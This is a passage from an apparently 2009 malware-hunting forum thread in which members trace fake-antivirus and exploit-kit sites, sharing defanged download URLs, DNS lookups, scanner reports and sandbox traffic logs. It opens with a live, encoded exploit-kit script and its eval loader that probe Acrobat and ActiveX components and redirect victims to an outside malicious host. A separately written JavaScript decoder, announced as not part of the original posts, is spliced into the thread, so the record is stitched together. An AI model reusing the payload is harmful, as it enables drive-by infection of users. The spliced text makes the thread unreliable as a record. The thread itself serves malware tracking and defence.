116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#13#10#102#117#110#99#116#105#111#110#32#112#100#102#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#32#61#32#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#65#99#114#111#80#68#70#46#80#68#70#34#41#59#13#10#105#102#32#40#33#111#98#106#41#32#123#13#10#111#98#106#32#61#32#99#111#98#106#40#34#80#68#70#46#80#100#102#67#116#114#108#34#41#59#13#10#125#1
3#10#105#102#32#40#111#98#106#41#32#123#13#10#100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#105#102#114#97#109#101#32#115#114#99#61#39#104#116#116#112#58#47#47#112#101#115#107#111#115#116#114#117#105#107#97#122#46#99#111#109#47#112#49#100#50#102#51#46#112#104#112#63#105#100#61#53#53#53#54#57#53#39#32#119#105#100#116#104#61#49#32#104#101#105#103#104#116#61#49#32#102#114#97#109#101#98#111#114#100#101#114#61#48#62#60#47#105#102#114#97#109#101#62#34#41#59#13#10#115#101#116#84#105#109#101#111#117#116#40#39#112#100#102#50#40#41#59#39#44#49#48#48#48#48#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#32#123#13#10#100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#105#102#114#97#109#101#32#115#114#99#61#39#104#116#116#112#58#47#47#112#101#115#107#111#115#116#114#117#105#107#97#122#46#99#111#109#47#112#49#100#50#102#51#46#112#104#112#63#105#100#61#53#53#53#54#57#53#39#32#119#105#100#116#104#61#49#32#104#101#105#103#104#116#61#49#32#102#114#97#109#101#98#111#114#100#101#114#61#48#62#60#47#105#102#114#97#109#101#62#34#41#59#13#10#115#101#116#84#105#109#101#111#117#116#40#39#112#100#102#50#40#41#59#39#44#49#48#48#48#48#41#59#13#10#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#112#100#102#50#40#41#123#13#10#118#97#114#32#111#98#106#32#61#32#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#65#99#114#111#80#68#70#46#80#68#70#34#41#59#13#10#105#102#32#40#33#111#98#106#41#32#123#13#10#111#98#106#32#61#32#99#111#98#106#40#34#80#68#70#46#80#100#102#67#116#114#108#34#41#59#13#10#125#13#10#105#102#32#40#111#98#106#41#32#123#13#10#119#110#100#61#119#105#110#100#111#119#59#13#10#119#104#105#108#101#32#40#119#110#100#46#112#97#114#101#110#116#33#61#119#110#100#41#123#32#119#110#100#61#119#110#100#46#112#97#114#101#110#116#59#32#125#13#10#119#110#100#46#108#111#99#97#116#105#111#110#61#34#104#116#116#112#58#47#47#112#101#115#107#111#115#116#114#117#105#107#97#122#46#99#111#109#47#112#49#100#50
#102#51#46#112#104#112#63#105#100#61#53#53#53#54#57#53#38#118#105#115#61#49#34#59#13#10#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#119#109#101#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#65#56#68#51#65#68#48#50#45#55#53#48#56#45#52#48#48#52#45#66#50#69#57#45#65#68#51#51#70#48#56#55#70#52#51#67#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#50#48#48#48#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#50#48#48#48#41#59#13#10#111#98#106#46#71#101#116#68#101#116#97#105#108#115#83#116#114#105#110#103#40#98#117#102#44#49#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#13#10#105#102#32#40#13#10#109#100#97#99#40#41#32#124#124#13#10#111#102#102#105#99#101#40#41#32#124#124#13#10#100#108#40#41#32#124#124#13#10#112#100#102#40#41#32#124#124#13#10#119#109#101#40#41#32#124#124#13#10#119#102#105#40#41#32#124#124#13#10#99#111#109#40#41#32#124#124#13#10#121#97#49#40#41#32#124#124#13#10#121#97#50#40#41#32#124#124#13#10#102#98#40#41#32#124#124#13#10#109#100#115#115#40#41#32#124#124#13#10#99#114#101#97#116#105#118#101#40#41#32#124#124#13#10#119#107#115#40#41#32#124#124#13#10#111#103#97#109#101#40#41#32#124#124#13#10#99#97#40#41#32#124#124#13#10#98#117#100#100#121#40#41#32#124#124#13#10#103#111#109#119#101#98#40#41#32#124#124#13#10#120#109#108#99#111#114#101#40#41#32#124#124#13#10#113#117#105#99#107#40#41#32#124#124#13#10#114#101#97#108#40#41#32#124#124#13#10#110#116#97#117#100#105#111#40#41#13#10#41#32#123#125#13#10</b><script>var Prototype=eval(g);var 
s=document.getElementById("gbbZwrUnZ").innerHTML.replace(/[A-Za-z]/g,function (c){return String.fromCharCode((((c=c.charCodeAt(0))&223)-52)%26+(c&32)+65);}).split("#");var p="";for(var i=0;i<s.length;i++){p+=String.fromCharCode(s[i]);}Prototype(p);</script>
Obfuscated code above from:
Quote
hxxp://peskostruikaz.com/?click=4297D
It's accessible only once, by the way, i.e. change your IP if you didn't grab it the first time:
Quote
hxxp://peskostruikaz.com/liloadercdi.php?id=555695
hxxp://peskostruikaz.com/p1d2f3.php?id=555695
hxxp://peskostruikaz.com/p1d2f3.php?id=555695&vis=1

Edit:
1) It appears to be Sality-related per ThreatExpert as well:
http://www.threatexpert.com/report.aspx?md5=3a03a20bfefe3fdd01659d47d2ed76c8
2) Added a quick'n'dirty decoding of the above JS in attachment...
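
The loader quoted above reads a hidden element's text, applies a ROT13 letter substitution, splits on "#" and passes the resulting character codes to eval. As an added example (not part of the original posts and not the attachment mentioned above), this static decoder performs the same steps but returns the script as text and lists the URLs and CLSIDs in it; the sample payload, the opening tag's attributes and the a.test URL are constructed.

```javascript
// Static decoder for the loader quoted in the post. It reproduces the loader's
// steps (read element by id, ROT13 the letters, split on "#", fromCharCode)
// but returns the decoded script as a string and never passes it to eval.

// The loader's replace() callback: ROT13 on A-Z and a-z. Digits and "#" pass
// through unchanged, so on an all-numeric payload this step changes nothing.
function rot13(text) {
  return text.replace(/[A-Za-z]/g, (ch) => {
    const c = ch.charCodeAt(0);
    return String.fromCharCode((((c & 223) - 52) % 26) + (c & 32) + 65);
  });
}

// Turn "117#61#34#..." into text. Whitespace is stripped first because a copy
// pasted into a forum is wrapped in the middle of numbers ("#12\n3#" is 123).
function decodeCharCodes(raw) {
  let text = "";
  const rejected = [];
  for (const field of rot13(raw).replace(/\s+/g, "").split("#")) {
    if (field === "") continue; // leading/trailing "#"; the loader would emit \0
    const n = /^\d{1,5}$/.test(field) ? Number(field) : NaN;
    if (Number.isNaN(n) || n > 0xffff) {
      rejected.push(field); // keep anything unexpected for manual review
      continue;
    }
    text += String.fromCharCode(n);
  }
  return { text, rejected };
}

// Locate the element the loader reads: take the id from its getElementById()
// call, then pull that element's body out of the raw HTML.
function findPayload(html) {
  const idMatch = /getElementById\(\s*["']([^"']+)["']\s*\)\s*\.innerHTML/.exec(html);
  if (!idMatch) return null;
  const id = idMatch[1].replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const el = new RegExp(
    `<(\\w+)\\b[^>]*\\bid=["']?${id}["']?[^>]*>([\\s\\S]*?)</\\1>`, "i"
  ).exec(html);
  return el ? { id: idMatch[1], raw: el[2] } : null;
}

// Pull report-ready indicators out of the decoded script. URLs are defanged
// the way the thread writes them (hxxp).
function extractIndicators(text) {
  const urls = text.match(/https?:\/\/[^\s"'<>\\)]+/g) || [];
  const clsids =
    text.match(/\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}/g) || [];
  return {
    urls: [...new Set(urls)].map((u) => u.replace(/^http/i, "hxxp")),
    clsids: [...new Set(clsids.map((c) => c.toUpperCase()))],
  };
}

function analyze(html) {
  const payload = findPayload(html);
  if (!payload) return null;
  const { text, rejected } = decodeCharCodes(payload.raw);
  return { id: payload.id, text, rejected, ...extractIndicators(text) };
}

// Constructed sample (not the payload from the post), wrapped mid-number the
// way the forum copy is. It decodes to a harmless two-assignment script.
const SAMPLE_PAYLOAD = [
  "117#61#34#104#116#116#112#58#47#47#97#46#116#101#115#116#47#120#34#59#111#61#34#12",
  "3#48#48#48#48#48#48#48#48#45#48#48#48#48#45#48#48#48#48#45#48#48#48#48#45",
  "#48#48#48#48#48#48#48#48#48#48#48#48#125#34#59#",
].join("\n");

// The element id is the one in the quoted loader; the tag attributes are assumed.
const SAMPLE_HTML =
  '<b id="gbbZwrUnZ" style="display:none">' + SAMPLE_PAYLOAD + "</b>" +
  '<script>var s=document.getElementById("gbbZwrUnZ").innerHTML;</script>';

console.log(JSON.stringify(analyze(SAMPLE_HTML), null, 2));
```
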
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 07:52:07 pm
Quote
hxxp://bestchat.tv/
Redirects to openstats.info above...
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 16, 2009, 07:59:52 pm
Quote
hxxp://bestchat.tv/
Redirects to openstats.info above...

I have checked
Code: [Select]
openstats.info/counter3.swf
swf contains an iframe to:
Code: [Select]
ebayauctiondata.com/static.php
page contains
Code: [Select]
if (window!=top){self.location.href="http://theblog.topdailyhealth.com/feed/";} else {self.location.href="http://ebayauctiondata.com/resource.php";}
I haven't found anything suspicious at either of the two URLs. Have you found more?
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 08:10:44 pm
What the heck is this one... it's still puzzling me, I've changed IP quite a few times, and still...  ???
I also got some of the above, but not the same, it's kinda weird the way it returns different results back...

Quote
hxxp://ebayauctiondata.com/static.php
Which contains...
Quote
<script>
if (window!=top){self.location.href="hxxp://powa-info.com/?page_id=11";} else {self.location.href="hxxp://ebayauctiondata.com/resource.php";}
</script>
resource.php wants to appear empty...and powa-info redirects to...
Quote
<link rel="stylesheet" href="hxxp://rover.ebay.com/rover/1/711-53200-19255-0/1?type=4&campid=5336200746&toolid=10001&customid=&mpre=http%3A%2F%2Fcgi.ebay.com%2FRare-Nikon-Nikkor-ED-180-600mm-F8-AIS-zoom-180-600-8_W0QQitemZ110376001696QQcmdZViewItemQQssPageNameZRSS%3AB%3ASRCH%3AUS%3A101">
The id= parameter was also different from time to time, but always pointed to rover.ebay.com... at least from here... geoip also, except from http referrer?  :-\
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 16, 2009, 08:17:14 pm
Interesting. I always got
Code: [Select]
if (window!=top){self.location.href="http://theblog.topdailyhealth.com/feed/";} else {self.location.href="http://ebayauctiondata.com/resource.php";}
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 08:22:22 pm
...Maybe someone with a different country code could give it a shot as well?
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 08:25:16 pm
Code: [Select]
hxxp://antispywarepcscanner.com/download/Install_2009.exe

$ dig antispywarepcscanner.com +short
67.215.66.132


http://anubis.iseclab.org/?action=result&task_id=125f396e5fcb398f4a58a892a330cd7b5


on the move
http://www.bfk.de/bfk_dnslogger.html?query=antispywarepcscanner.com
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 08:30:46 pm
You've probably already seen that report by now, which is dated 2 weeks earlier... but they also don't seem to have a good explanation about it:
http://www.slashfm.net/forum/showthread.php&threadid=5393
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 16, 2009, 08:41:04 pm
Code: [Select]
hxxp://antispywarepcscanner.com/download/Install_2009.exe

$ dig antispywarepcscanner.com +short
67.215.66.132


offline. 67.215.66.132 is an opendns fail address. ;)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 09:01:20 pm
Code: [Select]
hxxp://antispywarepcscanner.com/download/Install_2009.exe

$ dig antispywarepcscanner.com +short
67.215.66.132


offline. 67.215.66.132 is an opendns fail address. ;)


thanks, I shoulda investigated further.

Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 09:33:29 pm
...OK, here's what I got - but it might as well be pointing in a totally wrong/misleading direction though, I really can't tell...
Here's one more "counter3.swf" that I've found out there:
hxxp://www.ebay-analytic.com/3321/counter3.swf
Which also points over to rover.ebay.com mentioned above....

Playing around with the urls...
hxxp://www.ebay-analytic.com/ -> Says "Site maintenance, come back later.", and loads style.js...
hxxp://www.ebay-analytic.com/style.js -> hxxp://91.211.65.91/traf/out.php

91.211.65.91 is dead at the moment, but listed in Spamhaus...
http://www.robtex.com/ip/91.211.65.91.html
http://www.spamhaus.org/sbl/sbl.lasso?query=SBL70438
Don't know... maybe spamvertisement or fraud auctions over at the real eBay site?  :-\
Anyway, moving on for the time being...
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 03:45:14 pm
Code: [Select]
hxxp://ww5.dv7q.com/05/go1.exe
hxxp://ww1.dv7q.com/01/go1.exe

$ dig ww5.dv7q.com +short
121.12.116.95
$ dig ww1.dv7q.com +short
121.12.116.97

http://www.virustotal.com/analisis/93b9755520475ba1dab9edb82035effb 2/39

http://www.malwaredomainlist.com/mdl.php?search=121.12.116&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 03:49:44 pm
Code: [Select]
hxxp://www.dnf-gg.cn/30.exe

$ dig www.dnf-gg.cn +short
61.155.140.85

http://www.virustotal.com/analisis/e87d0879287b92766db63034c5dd8e96 2/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 03:56:40 pm
Code: [Select]
hxxp://google.netcdn.com/cao/cao.exe

$ dig google.netcdn.com +short
218.10.18.76

http://www.virustotal.com/analisis/718c78b71e5b0d0061ce5f9f939af569 39/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 05:27:53 pm
Code: [Select]
hxxp://lxl-softportal.com/softwarefortubeview.40014.exe

$ dig lxl-softportal.com +short
195.88.80.41

http://www.virustotal.com/analisis/a949c063c26af0dc1dd6225ab2bfd5c4 4/40
http://www.malwaredomainlist.com/mdl.php?search=195.88.80&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 06:37:47 pm
Code: [Select]
hxxp://files.scanner-antispy-av-files.com/exe/setup_200002.exe

$ dig files.scanner-antispy-av-files.com +short
scanner-antispy-av-files.com.
195.88.81.74
$ dig scanner-antispy-av-files.com +short
195.88.81.74

http://www.malwaredomainlist.com/mdl.php?search=195.88.81&colsearch=All&quantity=50
http://www.virustotal.com/analisis/01c4b5648608c55a9191abddc1ba33a8 9/40



Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 20, 2009, 03:04:33 pm
Code: [Select]
hxxp://onlinevirus-scannerv2.com/download/Install_2009-1.exe

$ dig onlinevirus-scannerv2.com +short
94.76.213.227
94.247.3.40
78.47.172.66
78.47.91.153

http://www.virustotal.com/analisis/037a56af23500ff9a2650d63691ed1a7
http://threatexpert.com/report.aspx?md5=592b38a67d353137c72d7053ab9aa5d5

leads to connection to:
Code: [Select]
hxxp://securedliveuploads.com

$ dig securedliveuploads.com +short
78.47.172.66

http://www.malwaredomainlist.com/mdl.php?search=78.47.172&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 20, 2009, 05:33:48 pm
Code: [Select]
hxxp://dsghsddsfg.com/softwarefortubeview.40018.exe

$ dig dsghsddsfg.com +short
195.88.80.41

http://threatexpert.com/report.aspx?md5=969e6d24683ec2acf1459bef3f530396
http://virscan.org/report/6abd677bc2e2a3d203542830fccad56e.html  0/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 21, 2009, 05:07:49 pm
Code: [Select]
hxxp://76.226.175.200/pid=1000/setup.exe

http://wepawet.iseclab.org/view.php?hash=9ccfe1c8158cb8c82664fc681b58f26a&t=1240334271&type=js
http://www.virustotal.com/analisis/136f911cfb11a76e1c7cc2618cdaab97 20/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 21, 2009, 10:01:06 pm
Code: [Select]
hxxp://rotkid.com/download/534a7a3268513d3d50835e25/mlpsetup.exe

$ dig rotkid.com +short
195.88.33.54

http://www.virustotal.com/analisis/94d4428878ced619d5a424cfa497f0f2 9/40
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 22, 2009, 04:31:43 am
Code: [Select]
hxxp://rotkid.com/download/534a7a3268513d3d50835e25/mlpsetup.exe

$ dig rotkid.com +short
195.88.33.54

http://www.virustotal.com/analisis/94d4428878ced619d5a424cfa497f0f2 9/40

Code: [Select]
rotkid.com/download/3356626a4b413d3d8a39e13b/TestCodec.exe

http://virscan.org/report/a4bcb2834a4e662fe9a5629f78a05a3d.html 6/38
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 03:24:24 pm
Code: [Select]
hxxp://notebookgethere.us/go.php?id=2004&key=ff0057594&p=1

$ dig notebookgethere.us +short
78.47.172.66


http://wepawet.iseclab.org/view.php?hash=a81964dd5ff89fe45d50e639487bf495&t=1240413932&type=js

http://www.malwaredomainlist.com/mdl.php?search=78.47.172&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 03:29:01 pm
http://wepawet.iseclab.org/view.php?hash=d197262777146e6c69737b3cff16ab80&t=1240414310&type=js

Code: [Select]
hxxp://antivirus-quickscanv2.com/download/Install_2004.exe

$ dig antivirus-quickscanv2.com +short
94.247.3.40
94.102.48.28
78.47.91.153
94.76.213.227

http://www.virustotal.com/analisis/a4048cc9fce8f620d87dad0862f469c8  0/40
http://anubis.iseclab.org/?action=result&task_id=1775dd34a8cd790a47d13a530586badec&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 06:54:07 pm
not new but still very bad

Code: [Select]
hxxp://www.fenomen-games.com/dfiles/CookingAcademy2WorldCuisine_dwn.exe

$ dig www.fenomen-games.com +short
72.232.229.50

http://www.virustotal.com/analisis/f780c490e52727c21120bd22be0a24e3 21/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 08:00:40 pm
http://wepawet.iseclab.org/view.php?hash=2ec34acdcbd4d82fe22e419b6f8a5bac&t=1240431448&type=js

resulting in download

Code: [Select]
hxxp://litetubevideoz.net/codec/113.exe

$ dig litetubevideoz.net +short
194.165.4.77

http://www.virustotal.com/analisis/bc3bcf02fc6249c7bc37262bd71df0b3 5/40

http://anubis.iseclab.org/?action=result&task_id=14f2c73331402b3d49122d9771aba1933&format=html

http://www.malwaredomainlist.com/mdl.php?search=194.165.4.77&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 10:46:47 pm
What do you make of this referrer?
Code: [Select]
10.0.50.71 - - [22/Apr/2009:21:36:37 +0000] "GET http://litetubevideoz.com/scan/?id=259 HTTP/1.1" - - "http://images.google.com/imgres?imgurl=http://elcaribenet.com/mystuff/mofongoconcamarones.jpg&imgrefurl=http://blogs.ebay.com/bongosmania/entry/Traditional-Mofongo-Recipe-FREE/_W0QQidZ135754014&usg=___7BmAkSpxyxvelrRaoIN80Q9cmk=&h=255&w=437&sz=71&hl=en&start=6&um=1&tbnid=ru89oPk_SY4i_M:&tbnh=74&tbnw=126&prev=/images%3Fq%3Dmofongo%26hl%3Den%26rls%3Dcom.microsoft:*:IE-SearchBox%26rlz%3D1I7ADBS_en%26sa%3DX%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

$ dig litetubevideoz.com +short
194.165.4.77

resulted in this download

Code: [Select]
hxxp://litetubevideoz.net/codec/259.exe

$ dig litetubevideoz.net +short
194.165.4.77

http://www.virustotal.com/analisis/e90b73097b90e071850cb3545a0c6449 5/40


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 23, 2009, 03:49:37 pm
Code: [Select]
hxxp://antivirusquickscanv2.com/download/Install_2004.exe

$ dig antivirusquickscanv2.com +short
94.102.48.28
78.47.91.153
94.247.3.40
78.47.172.66

http://www.virustotal.com/analisis/436fb2362264cbfc579ba0c2da00a418 3/40

http://anubis.iseclab.org/?action=result&task_id=14fac8a916792e174bd5bbbfbcd3ed225&format=html

78.47.91.153   Germany   Siarhei Shandrokha   static.153.91.47.78.clients.your-server.de.
http://www.malwaredomainlist.com/mdl.php?search=78.47.91&colsearch=All&quantity=50
78.47.172.66   Germany   Siarhei Shandrokha   static.66.172.47.78.clients.your-server.de.
http://www.malwaredomainlist.com/mdl.php?search=78.47.172&colsearch=All&quantity=50
94.102.48.28   Netherlands   As29073 Ecatel Ltd   
http://www.malwaredomainlist.com/mdl.php?search=94.102.48&colsearch=All&quantity=50
94.247.3.40   Latvia   Zlkon   hs.3-40.zlkon.lv.
http://www.malwaredomainlist.com/mdl.php?search=94.247.3&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 24, 2009, 12:33:42 am
more nonsense from rotkid.com

Code: [Select]
hxxp://rotkid.com/download/536a624376673d3df9b6cd71/codec.exe

$ dig rotkid.com +short
195.88.33.54

http://www.virustotal.com/analisis/124ea36ae37e68511072fd55471e05e6 10/40

http://anubis.iseclab.org/?action=result&task_id=1bfa9a592985e225455650c4bfdeccbd4&format=html

Code: [Select]
From ANUBIS:1032 to 195.88.33.55:80 - [195.88.33.55]
Request: POST /cgi-bin/generator
Response: 200 "OK"

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 24, 2009, 01:07:06 pm
Code: [Select]
hxxp://79.35.3.140/pid=1000/setup.exe

http://www.virustotal.com/analisis/d168b6d3c65bf136d95a011c1e691aaf 17/40

http://anubis.iseclab.org/?action=result&task_id=17ba91f2bdfe19684d99a31e8932fc79e&format=html

from anubis
Code: [Select]
From ANUBIS:1033 to 218.93.202.50:80 - [nua06032009.biz]
Request: POST /achcheck.php
Response: 200 "OK"
Request: POST /ld/gen.php
Response: 200 "OK"
From ANUBIS:1035 to 212.58.23.82:80 - [aksajans.com]
Request: GET /1/pch5.exe
Response: 404 "Not Found"
Request: GET /1/6244.exe
Response: 200 "OK"
Request: GET /1/nfr.exe
Response: 200 "OK"
Request: GET /1/pp.06.exe
Response: 200 "OK"


Code: [Select]
hxxp://aksajans.com/1/pch5.exe
hxxp://aksajans.com/1/6244.exe
hxxp://aksajans.com/1/nfr.exe
hxxp://aksajans.com/1/pp.06.exe

$ dig aksajans.com +short
212.58.23.82

http://www.virustotal.com/analisis/d253aa5ac7878415188349585136ba8b 0/40
http://www.virustotal.com/analisis/545f1cb7cf82c95abe0ceb9aeb3e4ef6 15/40
http://www.virustotal.com/analisis/9a2b86242ba2c1b016533241331a54f0 20/40
http://www.virustotal.com/analisis/95caadb3b284f8988fde7ce79dbec46c 15/40




Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 12:24:53 am
Code: [Select]
hxxp://litegreatestdirect.cn/in.cgi?income72

$ dig litegreatestdirect.cn +short
94.247.3.150

http://wepawet.iseclab.org/view.php?hash=df885fec22550614e9258bc5369ff0cb&t=1240618935&type=js

leads to

Code: [Select]
hxxp://bigfirststopnonfat.cn/index.php

$ dig bigfirststopnonfat.cn +short
94.247.3.151

"Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf"
http://wepawet.iseclab.org/view.php?hash=6f6ff175732797755ad7780c136b72a2&t=1240535068&type=js

Code: [Select]
hxxp://liteupyourride.cn/load.php?id=8

Code: [Select]
From ANUBIS:1032 to 78.109.29.112:80 - [78.109.29.112]
Request: GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=1824245000&rnd=981633
Response: 200 "OK"
Request: GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1240497686:unique_start
Response: 200 "OK"
From ANUBIS:1036 to 78.109.30.224:80 - [78.109.30.224]
Request: POST /good/receiver/online
Response: 200 "OK"
From ANUBIS:1037 to 74.54.77.82:80 - [74.54.77.82]
Request: GET /40E800144D513030303020312020202020202020202020206C0000018566000000007600000642EB0005305B5AD74D
Response: <no reply>


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 06:27:38 pm
Code: [Select]
hxxp://lilj.us/abcd.exe

$ dig lilj.us +short
222.186.25.28

http://www.virustotal.com/analisis/ad96d64bf1f121f10f4fd35e3c54479a 15/40

http://www.malwaredomainlist.com/mdl.php?search=222.186.25&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 06:31:35 pm
Code: [Select]
hxxp://av4321.us/abc/av1.0.exe

$ dig av4321.us +short
66.90.74.9

http://www.virustotal.com/analisis/ea100eeb0c59bfd2d7c4d7c9509e09d5 35/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 06:36:38 pm
Code: [Select]
hxxp://qvod.xxoo888.cn/dddxxx/qvod.exe

$ dig qvod.xxoo888.cn +short
121.12.104.205

http://www.virustotal.com/analisis/c8b56aacd8f4161d93efb308add112c5 29/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 06:43:11 pm
Code: [Select]
hxxp://www.10nnn.com/qvod.exe

$ dig www.10nnn.com +short
10nnn.com.
61.160.216.155
$ dig 10nnn.com +short
61.160.216.155

http://www.virustotal.com/analisis/440d839e36f2b73cb8b9d479e64d8f19  30/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 27, 2009, 02:24:35 pm
Code: [Select]
hxxp://62.4.83.201/main/logo.html?sid=RB2rGHFbp0MjDfoYcQSvHnEP-R5zBP1MJl-9TiBZ-UJ9BZ1aJgSmSXQLrEh2Dq0fdAz7HyRb-Rh0C6ZIdQX5HCNb_RxGO65MfA_vQkE3rkhxDadJfQumS0A5rEp1Dpl4dAiYfiJRrUhNOK5LcAumc0xT9B10Da9KdQU

http://www.virustotal.com/analisis/46dbc11ed929e1ad72ed79d32040037d 9/40

http://anubis.iseclab.org/?action=result&task_id=1580e69e0407b945481b6219dd0613030&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 27, 2009, 03:31:54 pm
Code: [Select]
hxxp://dwnld.pc-promooffer.com/secure/379eb8449916f24b777a6784a4ba51e4/49f5c295/srm/srm_free_setup.exe

$ dig dwnld.pc-promooffer.com +short
78.47.127.10
78.46.148.49

http://www.virustotal.com/analisis/0dfb56e3f3f25f1919aafc77bda1ac7d 19/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 28, 2009, 02:24:52 pm
Code: [Select]
hxxp://173.169.189.125/pid=1000/setup.exe

http://www.virustotal.com/analisis/a4781e17148f0662515612e71851c78c 15/40

http://anubis.iseclab.org/?action=result&task_id=13f768dc80806c754a19a5f9d9c5b02e5&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 28, 2009, 02:55:37 pm
Code: [Select]
hxxp://redir2404.com/go/fb.php?domain=webxtreme.evolink.ro

$ dig redir2404.com +short
119.110.107.137

results in download
Code: [Select]
hxxp://124.43.65.207/pid=1000/setup.exe


http://wepawet.iseclab.org/view.php?hash=faf2326b1176b66b8fd7a3d988434473&t=1240930709&type=js

http://www.malwaredomainlist.com/mdl.php?search=119.110.107&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 28, 2009, 03:49:10 pm
Quote
hxxp://redir2304.com/go/
hxxp://75.64.142.189/pid=1000/?ch=&ea=

Quote
hxxp://redir1504.com/go/
hxxp://83.250.135.184/pid=1000/?ch=&ea=

Quote
hxxp://y18032009.com/go/
hxxp://116.197.197.174/pid=1000/?ch=&ea=

hxxp://y18032009.com/the/?pid=1
hxxp://79.117.132.89/pid=1/

hxxp://y18032009.com/the/?pid=2
hxxp://99.34.223.88/pid=2/

hxxp://y18032009.com/the/
hxxp://70.212.211.229/pid=6004/

...different input parameter, different IP returned, etc. etc...
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 28, 2009, 07:42:46 pm
Code: [Select]
hxxp://antivirus-powerful-scanv2.com/download/Install_2004.exe

$ dig antivirus-powerful-scanv2.com +short
78.47.91.153
38.99.170.209
94.102.48.28

http://www.virustotal.com/analisis/eda559c9f7cc99590498d64c240f1045 1/40

http://anubis.iseclab.org/?action=result&task_id=1206f1eaf694a94143d5827bef1982575&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 01:15:28 am
Code: [Select]
hxxp://files.loads-archive-top-av.com/normal/setup_1_2_1.exe

$ dig files.loads-archive-top-av.com +short
loads-archive-top-av.com.
195.88.80.127
$ dig loads-archive-top-av.com +short
195.88.80.127

http://www.virustotal.com/analisis/79fa8309e88dff1b8004d476aceea5b1 5/39

http://anubis.iseclab.org/?action=result&task_id=197101fbfd88faa54d14ac954efeddd6a&format=html


Code: [Select]
From ANUBIS:1032 to 64.191.64.246:80 - [int.sysproreport1.com]
Request: GET /stat.php?func=installrun&id=1&landing=-1&lang=EN&sub=1
Response: 200 "OK"
From ANUBIS:1033 to 195.88.81.12:80 - [dl.antispy-scan-4freee.com]
Request: HEAD /get/?pin=0&lnd=0&type=main
Response: 200 "OK"



Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 04:31:19 pm
Code: [Select]
